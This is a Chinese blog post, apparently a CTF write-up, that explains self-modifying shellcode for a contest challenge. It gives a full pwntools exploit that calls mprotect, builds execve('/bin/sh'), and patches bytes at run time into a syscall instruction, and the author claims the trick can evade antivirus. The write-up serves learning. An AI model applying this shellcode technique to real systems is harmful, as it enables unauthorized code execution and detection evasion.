<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"maple-pwn.github.io","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.23.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="自改变shellcodeby Maple 校赛的shell_for_shell打破防了，但学到了一个叫做自改变shellcode的shellcode注入方式，理论来说可以实现所有的shellcode免杀，记录一下 先贴exp： 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474">
<meta property="og:type" content="article">
<meta property="og:title" content="Maple">
<meta property="og:url" content="http://maple-pwn.github.io/2025/04/04/basic/%E8%87%AA%E6%94%B9%E5%8F%98shellcode/index.html">
<meta property="og:site_name" content="Maple">
<meta property="og:description" content="自改变shellcodeby Maple 校赛的shell_for_shell打破防了，但学到了一个叫做自改变shellcode的shellcode注入方式，理论来说可以实现所有的shellcode免杀，记录一下 先贴exp： 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://maple-pwn.github.io/images/image-20250401233510572.png">
<meta property="article:published_time" content="2025-04-03T17:34:36.748Z">
<meta property="article:modified_time" content="2025-04-01T16:54:32.027Z">
<meta property="article:author" content="Maple">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://maple-pwn.github.io/images/image-20250401233510572.png">


<link rel="canonical" href="http://maple-pwn.github.io/2025/04/04/basic/%E8%87%AA%E6%94%B9%E5%8F%98shellcode/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://maple-pwn.github.io/2025/04/04/basic/%E8%87%AA%E6%94%B9%E5%8F%98shellcode/","path":"2025/04/04/basic/自改变shellcode/","title":""}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title> | Maple</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  






  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Maple</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">Maple’s Blog</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>







</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%87%AA%E6%94%B9%E5%8F%98shellcode"><span class="nav-number">1.</span> <span class="nav-text">自改变shellcode</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%81%A2%E5%A4%8D%E6%A0%88-%E8%B0%83%E7%94%A8mprotect%E6%94%B9%E6%9D%83%E9%99%90"><span class="nav-number">1.1.</span> <span class="nav-text">恢复栈+调用mprotect改权限</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8E%8B%E6%A0%88%E6%9E%84%E9%80%A0execve%E7%9A%84%E5%8F%82%E6%95%B0%EF%BC%8C%E5%87%86%E5%A4%87%E6%89%A7%E8%A1%8Cshellcode"><span class="nav-number">1.2.</span> <span class="nav-text">压栈构造execve的参数，准备执行shellcode</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%86%99%E5%85%A5syscall"><span class="nav-number">1.3.</span> <span class="nav-text">写入syscall</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Maple</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">44</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://maple-pwn.github.io/2025/04/04/basic/%E8%87%AA%E6%94%B9%E5%8F%98shellcode/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Maple">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Maple">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content=" | Maple">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2025-04-04 01:34:36" itemprop="dateCreated datePublished" datetime="2025-04-04T01:34:36+08:00">2025-04-04</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2025-04-02 00:54:32" itemprop="dateModified" datetime="2025-04-02T00:54:32+08:00">2025-04-02</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="自改变shellcode"><a href="#自改变shellcode" class="headerlink" title="自改变shellcode"></a>自改变shellcode</h1><p>by Maple</p>
<p>校赛的<code>shell_for_shell</code>打破防了，但学到了一个叫做<strong>自改变shellcode</strong>的shellcode注入方式，理论来说可以实现所有的shellcode免杀，记录一下</p>
<p>先贴exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">context.terminal = <span class="string">&#x27;wt.exe -d . wsl.exe -d Ubuntu&#x27;</span>.split()</span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"><span class="comment">#libc = ELF(&quot;./libc.so.6&quot;)</span></span><br><span class="line">p = process(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">gdb.attach(p)</span><br><span class="line"></span><br><span class="line"><span class="comment">#----恢复栈帧------</span></span><br><span class="line">shellcode = <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">	mov rbp, 0x404500</span></span><br><span class="line"><span class="string">    mov rsp, rbp</span></span><br><span class="line"><span class="string">    lea r15, [rip+0xe00]</span></span><br><span class="line"><span class="string">    sub r15, 0xe16</span></span><br><span class="line"><span class="string">    mov rdi, r15</span></span><br><span class="line"><span class="string">    mov rsi, 0x1000</span></span><br><span class="line"><span class="string">    mov rdx, 0x7</span></span><br><span class="line"><span class="string">    mov rax, 0x401070</span></span><br><span class="line"><span class="string">    call rax</span></span><br><span class="line"><span class="string">    mov si, word ptr [r15 + 0x100]</span></span><br><span class="line"><span class="string">    add si, 0x101</span></span><br><span class="line"><span class="string">    mov word ptr [r15 + 0x100], si</span></span><br><span class="line"><span class="string">    push 0x68</span></span><br><span class="line"><span class="string">    mov rax, 0x732f2f2f6e69622f</span></span><br><span class="line"><span class="string">    push rax</span></span><br><span class="line"><span class="string">    mov rdi, rsp</span></span><br><span class="line"><span class="string">    /* push argument array [&#x27;sh\x00&#x27;] */</span></span><br><span class="line"><span class="string">    /* push b&#x27;sh\x00&#x27; */</span></span><br><span class="line"><span class="string">    push 0x1010101 ^ 0x6873</span></span><br><span class="line"><span class="string">    xor dword ptr [rsp], 0x1010101</span></span><br><span class="line"><span class="string">    xor esi, esi /* 0 */</span></span><br><span class="line"><span class="string">    push rsi /* null terminate */</span></span><br><span class="line"><span class="string">    push 8</span></span><br><span class="line"><span class="string">    pop rsi</span></span><br><span class="line"><span class="string">    add rsi, rsp</span></span><br><span class="line"><span class="string">    push rsi /* &#x27;sh\x00&#x27; */</span></span><br><span class="line"><span class="string">    mov rsi, rsp</span></span><br><span class="line"><span class="string">    xor edx, edx /* 0 */</span></span><br><span class="line"><span class="string">    /* call execve() */</span></span><br><span class="line"><span class="string">    push SYS_execve /* 0x3b */</span></span><br><span class="line"><span class="string">    pop rax</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line">payload = (<span class="string">b&quot;\x00\xc0&quot;</span>+asm(shellcode)).ljust(<span class="number">0x100</span>-<span class="number">3</span>, <span class="string">b&quot;\x90&quot;</span>)+<span class="string">b&quot;\x0e\x04&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(payload)</span><br><span class="line">p.send(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>这边分段分析一下</p>
<h2 id="恢复栈-调用mprotect改权限"><a href="#恢复栈-调用mprotect改权限" class="headerlink" title="恢复栈+调用mprotect改权限"></a>恢复栈+调用mprotect改权限</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">mov rbp, 0x404500		;栈底恢复</span><br><span class="line">   mov rsp, rbp			;rbp赋给rsp，恢复栈顶</span><br><span class="line">   lea r15, [rip+0xe00]	;这里如果动调过会发现rip被保留了（其实看ida的汇编码也能看出来），就拿rip做传递栈指针</span><br><span class="line">   sub r15, 0xe16			;额外减0x16，退回最开始的地址（之前总共0x16字节的汇编程序）</span><br><span class="line">   mov rdi, r15			;rdi被传递,这里即addr = rdi</span><br><span class="line">   mov rsi, 0x1000			;len = 0x1000</span><br><span class="line">   mov rdx, 0x7			;prot = 7</span><br><span class="line">   mov rax, 0x401070		;rax = 0x401070(对应mprotecct)</span><br><span class="line">   call rax				;call mprotect指令</span><br></pre></td></tr></table></figure>

<p>这里将栈底恢复为<code>0x404500</code>(因为动调发现这里有写入权限)，而写中间值是为了方便上下增长</p>
<p><img src="/./images/image-20250401233510572.png" alt="image-20250401233510572"></p>
<h2 id="压栈构造execve的参数，准备执行shellcode"><a href="#压栈构造execve的参数，准备执行shellcode" class="headerlink" title="压栈构造execve的参数，准备执行shellcode"></a>压栈构造execve的参数，准备执行shellcode</h2><p>这里构造了<code>execve(&quot;/bin/sh&quot;,[&quot;sh&quot;,NULL],NULL)</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">mov si, word ptr [r15 + 0x100]	;r15的值+0x100，赋给si（rsi，16位模式)</span><br><span class="line">   add si, 0x101					;再将si加上0x101</span><br><span class="line">   mov word ptr [r15 + 0x100], si	;修改后的si存给r15+0x100的内存位置</span><br><span class="line">   /*这里是为了给后面syscall找个确定位置，顺便自加一*/</span><br><span class="line">   push 0x68						;压入&quot;h&quot;</span><br><span class="line">   mov rax, 0x732f2f2f6e69622f		;压入/bin///s到rax中</span><br><span class="line">   push rax						;压入rax中的值</span><br><span class="line">   mov rdi, rsp					;栈顶指针给rdi，作为路径字符串的地址，后面直接写入execve</span><br><span class="line"></span><br><span class="line">   push 0x1010101 ^ 0x6873			;异或的值压栈，避免显式空字节</span><br><span class="line">   xor dword ptr [rsp], 0x1010101	;异或解密栈顶4字节，得到&#x27;sh\x00&#x27;</span><br><span class="line">   xor esi, esi /* 0 */</span><br><span class="line">   push rsi 						;作为字符串的\x00</span><br><span class="line">   push 8							;压入8，后面计算‘sh\x00&#x27;字符串地址用</span><br><span class="line">   pop rsi							;将8弹给rsi</span><br><span class="line">   add rsi, rsp					;rsi=8+rsp，指向&#x27;sh\x00&#x27;</span><br><span class="line">   push rsi 						;压入sh\x00</span><br><span class="line">   mov rsi, rsp</span><br><span class="line">   xor edx, edx /* 0 */</span><br><span class="line">   /* call execve() */</span><br><span class="line">   push SYS_execve 				;等价于push 0x3b</span><br><span class="line">   pop rax							;弹给rax</span><br></pre></td></tr></table></figure>

<h2 id="写入syscall"><a href="#写入syscall" class="headerlink" title="写入syscall"></a>写入syscall</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload = (<span class="string">b&quot;\x00\xc0&quot;</span>+asm(shellcode)).ljust(<span class="number">0x100</span>-<span class="number">3</span>, <span class="string">b&quot;\x90&quot;</span>)+<span class="string">b&quot;\x0e\x04&quot;</span></span><br></pre></td></tr></table></figure>

<p>这里是题目问题，先随便写一个代码在这里，消除第一字节为<code>\x00</code>的影响</p>
<p>写入了<code>\x90(nop)</code>指令填充</p>
<p>接下来<code>\x0e\x04</code>在第100字节那里了，然后就是<code>40e+101</code>返回给rsi，变成了<code>50f</code>,也就是<code>\x0f\x05</code>(syscall的机器码)</p>
<p>之后又把这个写回去，跟<code>pop rax</code>续上，执行完整的shellcode</p>

    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/04/04/basic/PIE/" rel="prev" title="">
                  <i class="fa fa-angle-left"></i> 
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/04/04/buuctf/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%881-20%E9%A2%98%EF%BC%89/" rel="next" title="">
                   <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Maple</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
